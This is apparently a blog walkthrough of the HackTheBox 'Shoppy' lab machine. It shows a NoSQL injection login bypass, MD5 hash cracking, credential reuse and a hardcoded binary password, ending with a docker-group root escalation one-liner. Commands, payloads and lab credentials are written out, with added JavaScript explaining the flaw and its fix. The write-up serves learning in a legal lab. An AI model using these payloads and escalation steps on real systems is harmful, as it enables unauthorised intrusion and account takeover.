
HackTheBox Shoppy

Published 2023/01/15

Shoppy

Foothold

nmap

Port scan

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ sudo nmap -Pn -n -v --reason -sS -p- --min-rate=1000 -A 10.10.11.180 -oN nmap.log
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp   open  http     syn-ack ttl 63 nginx 1.23.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
9093/tcp open  copycat? syn-ack ttl 63
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Fri, 07 Oct 2022 05:29:17 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 6
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 6
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 3.9468e-05
|     go_gc_duration_seconds{quantile="0.25"} 5.5801e-05
|     go_gc_dur
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Content-Type: text/plain; version=0.0.4; charset=utf-8
|     Date: Fri, 07 Oct 2022 05:29:18 GMT
|     HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
|     TYPE go_gc_cycles_automatic_gc_cycles_total counter
|     go_gc_cycles_automatic_gc_cycles_total 6
|     HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
|     TYPE go_gc_cycles_forced_gc_cycles_total counter
|     go_gc_cycles_forced_gc_cycles_total 0
|     HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
|     TYPE go_gc_cycles_total_gc_cycles_total counter
|     go_gc_cycles_total_gc_cycles_total 6
|     HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
|     TYPE go_gc_duration_seconds summary
|     go_gc_duration_seconds{quantile="0"} 3.9468e-05
|     go_gc_duration_seconds{quantile="0.25"} 5.5801e-05
|_    go_gc_dur

Ports 22, 80 and 9093 are open. Port 80 redirects to http://shoppy.htb, so add that name to /etc/hosts before going further.

web


Also try port 9093.

Nothing useful here for now. The `Content-Type: text/plain; version=0.0.4` header and the go_* metric names in the nmap fingerprint mark it as a Prometheus-format metrics endpoint for a Go service, which is worth keeping in mind once a Go application turns up on the box.

dir

Run directory enumeration

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ gobuster dir -u http://shoppy.htb/ -w /usr/share/wordlists/dirb/common.txt -o gobuster_dir.log 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://shoppy.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/07 14:35:06 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 302) [Size: 28] [--> /login]
/Admin                (Status: 302) [Size: 28] [--> /login]
/ADMIN                (Status: 302) [Size: 28] [--> /login]
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/favicon.ico          (Status: 200) [Size: 213054]             
/fonts                (Status: 301) [Size: 177] [--> /fonts/]  
/images               (Status: 301) [Size: 179] [--> /images/] 
/js                   (Status: 301) [Size: 171] [--> /js/]     
/login                (Status: 200) [Size: 1074]               
/Login                (Status: 200) [Size: 1074]               
===============================================================
2022/10/07 14:36:30 Finished
===============================================================

Found /login; /admin redirects there, so that is the target.

login


A login page is displayed. Capture the login POST:

POST /login HTTP/1.1
Host: shoppy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://shoppy.htb
Connection: close
Referer: http://shoppy.htb/login
Upgrade-Insecure-Requests: 1

username=admin'||'1==1&password=password

Craft the request in Burp Suite and try a NoSQL injection. The `'` closes the string literal and `||'1==1` appends an always-truthy operand, the pattern for user input concatenated into a MongoDB `$where` JavaScript expression.

Found. Redirecting to <a href="/admin">/admin</a>

The response redirects to the admin page, so the injection worked (`Found. Redirecting to ...` is the Express default redirect body).

admin


In the top right there is a "Search for users" button

Click it and enter admin. Then click "Downloads exports"

A hashed password is shown.
To list the other users, enter the same string used for the NoSQL injection in the search box

This reveals josh's password hash
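The following is an added example, not the Shoppy app's source (which the post does not show). It reconstructs the pattern that the payload `admin'||'1==1` is built for, user input concatenated into a MongoDB `$where` JavaScript expression, and shows why the same string both bypasses the login above and makes the user search return every account. The login query shape with a password clause is an assumption; the sample collection is constructed; MongoDB's `$where` evaluation is emulated in memory so the file runs without a database.

```javascript
// Added example, not the Shoppy app's source. Reconstructs the classic
// Mongoose/MongoDB $where string-concatenation bug the payload admin'||'1==1
// targets, and emulates $where evaluation in memory (no database needed).

// Constructed sample collection, not the box's real data.
const users = [
  { username: 'admin', password: 'a1b2c3d4a1b2c3d4a1b2c3d4a1b2c3d4' },
  { username: 'josh',  password: 'e5f6a7b8e5f6a7b8e5f6a7b8e5f6a7b8' },
];

// Vulnerable login query (assumed shape): both fields spliced into JS source.
function buildLoginWhere(username, password) {
  return "this.username == '" + username + "' && this.password == '" + password + "'";
}

// Vulnerable user-search query: one field spliced into JS source.
function buildSearchWhere(username) {
  return "this.username == '" + username + "'";
}

// Emulates $where: the string is compiled as a function with `this` bound to
// each document, and the documents where it evaluates truthy are returned.
function runWhere(whereExpr, collection) {
  const pred = new Function('return (' + whereExpr + ');');
  return collection.filter((doc) => pred.call(doc));
}

// Hardened form: a plain equality filter. The value is data, not code, so
// quotes and operators cannot change the query, and non-string input (the
// operator-injection form {"$ne": null} from a JSON body) is rejected outright.
function findByUsernameSafe(username, collection) {
  if (typeof username !== 'string') return [];
  return collection.filter((doc) => doc.username === username);
}

const payload = "admin'||'1==1";

// Login: the expression becomes
//   this.username == 'admin'||'1==1' && this.password == 'password'
// which parses as (username == 'admin') || ('1==1' && password == 'password'),
// so the admin document matches whatever password was sent.
const loggedIn = runWhere(buildLoginWhere(payload, 'password'), users).map((u) => u.username);

// Search: the same payload is truthy for every document, which is why the
// export then contained josh's hash as well as admin's.
const exported = runWhere(buildSearchWhere(payload), users).map((u) => u.username);

console.log({ loggedIn, exported, safe: findByUsernameSafe(payload, users) });
```

The fix is structural rather than input filtering: never build `$where` (or `$function`) source from request data, pass values as query operands, and reject non-string values for fields that must be strings.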

hashcat

To crack the hash, run hashcat against rockyou.txt. The hash is 32 hex characters, so `-m 0` (raw MD5) is the first mode to try.

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
===============================================================
6ebcea65320589ca4f2f1ce039975995:remembermethisway
===============================================================

It cracks to remembermethisway.

vhost

Tried SSH with josh's credentials, but it failed, so continued enumerating for other information

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ gobuster vhost -u http://shoppy.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150 2>/dev/null -o gobuster_vhost.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://shoppy.htb/
[+] Method:       GET
[+] Threads:      150
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/10/07 15:10:51 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2022/10/07 15:13:14 Finished
===============================================================

Nothing hit. This was followed by a stretch where nothing turned up.

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ gobuster vhost -u http://shoppy.htb/ -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 150 2>/dev/null -o gobuster_vhost.log 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://shoppy.htb/
[+] Method:       GET
[+] Threads:      150
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/10/07 15:18:33 Starting gobuster in VHOST enumeration mode
===============================================================
Found: mattermost.shoppy.htb (Status: 200) [Size: 3122]
===============================================================
2022/10/07 15:20:51 Finished
===============================================================

Switching to a different wordlist and searching for subdomains again found mattermost. gobuster's vhost mode fuzzes the Host header, so a hit depends entirely on the candidate name being in the list. Add mattermost.shoppy.htb to /etc/hosts as well.

mattermost


A login screen is shown.

Logging in with josh's credentials obtained earlier succeeds (password reuse between the shop and Mattermost).

Browsing around for a while turns up a chat message containing credentials for a server:

Hey @josh,

For the deploy machine, you can create an account with these creds :
username: jaeger
password: Sh0ppyBest@pp!
And deploy on it.

Shell as jaeger

SSH

Using the credentials found in the chat

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ ssh jaeger@10.10.11.180
jaeger@10.10.11.180's password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ whoami
jaeger

Foothold obtained

user flag

jaeger@shoppy:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Flag obtained

Enumeration

sudo -l

jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

jaeger can run deploy's password-manager with `sudo -u deploy` (sudo prompts for jaeger's own password, which we have)

password-manager

First, take a look at the contents

jaeger@shoppy:/home/deploy$ cat password-manager
Welcome to Josh password manager!
Please enter your master password: 
SampleAccess granted! 
Here is creds !
cat /home/deploy/creds.txtAccess denied! 
This incident will be reported !

Most of it is binary and unreadable, but the fragment above shows that a master password is requested. `Sample` sits directly between the prompt and `Access granted!`, which is where a hardcoded comparison string ends up in the binary's string table, so it may well work as-is. `strings` (or `ltrace` to watch the comparison call) is the cleaner way to recover the same thing.
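An added example, not code from the original post: a minimal `strings` in Node, run over a constructed buffer that mimics the string literals visible in the cat output above (the real binary is not reproduced). The `findCandidateSecrets` heuristic is my own assumption about what a hardcoded password looks like when it sits among prompts and paths.

```javascript
// Added example, not from the post. A small `strings` clone plus a heuristic
// for spotting a hardcoded secret among a binary's printable runs.

// Collects runs of printable ASCII of at least minLen bytes, like strings(1).
function extractStrings(buf, minLen = 4) {
  const out = [];
  let run = '';
  for (const b of buf) {
    if (b >= 0x20 && b <= 0x7e) {        // printable ASCII range
      run += String.fromCharCode(b);
    } else {
      if (run.length >= minLen) out.push(run);
      run = '';
    }
  }
  if (run.length >= minLen) out.push(run);
  return out;
}

// Constructed stand-in for the binary: an ELF magic, the literals seen in the
// cat output separated by NUL terminators, and some opaque trailing bytes.
const fakeBinary = Buffer.concat([
  Buffer.from([0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00]),
  Buffer.from('Welcome to Josh password manager!\0'),
  Buffer.from('Please enter your master password: \0'),
  Buffer.from('Sample\0'),                       // the hardcoded comparison value
  Buffer.from('Access granted! \0'),
  Buffer.from('Here is creds !\0'),
  Buffer.from('cat /home/deploy/creds.txt\0'),
  Buffer.from('Access denied! \0'),
  Buffer.from('This incident will be reported !\0'),
  Buffer.from([0x00, 0x01, 0x02, 0x90, 0xcc, 0xc3]),
]);

// Heuristic (assumption): prompts contain spaces or punctuation and paths
// contain '/', while a password literal is usually a single short token.
function findCandidateSecrets(strings) {
  return strings.filter((s) => !/[!:?/ ]/.test(s) && s.length <= 32);
}

// Shows the context around each candidate, which is what made "Sample" obvious:
// it is sandwiched between the prompt and the success message.
function candidatesWithContext(strings) {
  return findCandidateSecrets(strings).map((s) => {
    const i = strings.indexOf(s);
    return { secret: s, before: strings[i - 1] || null, after: strings[i + 1] || null };
  });
}

console.log(candidatesWithContext(extractStrings(fakeBinary)));
```

`cat` happened to show the same literals because the terminal dropped the NUL bytes between them; a proper `strings` run gives one literal per line and avoids terminal corruption from the binary's other bytes. The underlying defect is the same either way: a secret compared against a constant in the executable is readable by anyone who can read the file.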

jaeger@shoppy:/home/deploy$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!

Authentication succeeds and deploy's credentials are displayed

Shell as deploy

SSH

Using the credentials above, SSH in again

┌──(kali㉿kali)-[~/Desktop/Shoppy]
└─$ ssh deploy@10.10.11.180     
deploy@10.10.11.180's password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ whoami
deploy

Shell obtained

Privilege escalation

id

The usual flow turned up no leads, so I ran id almost as an afterthought

$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)

The output shows membership of the docker group.
Reading the Mattermost chat more carefully also turns up a message about Docker having been installed. Membership of the docker group is effectively root: the daemon runs as root, and any member can ask it to start a container with the host filesystem mounted inside.

Shell as root

docker run

Aiming for privilege escalation with the GTFOBins entry for docker: `-v /:/mnt` bind-mounts the host's root filesystem into the container and `chroot /mnt sh` makes it the shell's root, so the resulting shell is root on the host. The image has to be available to the daemon (run `docker images` to see what is present if a pull is not possible).

$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh 
# whoami
root

Privilege escalation successful

root flag

# cat root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Flag obtained

Thoughts

Overall this box did not feel especially hard, but I spent a lot of time on the subdomain enumeration and on the id command step, so I want to put together a set of reliable wordlists to help with future boxes. NoSQL injection is a strong area of mine, so I was glad I could get it to fire cleanly.
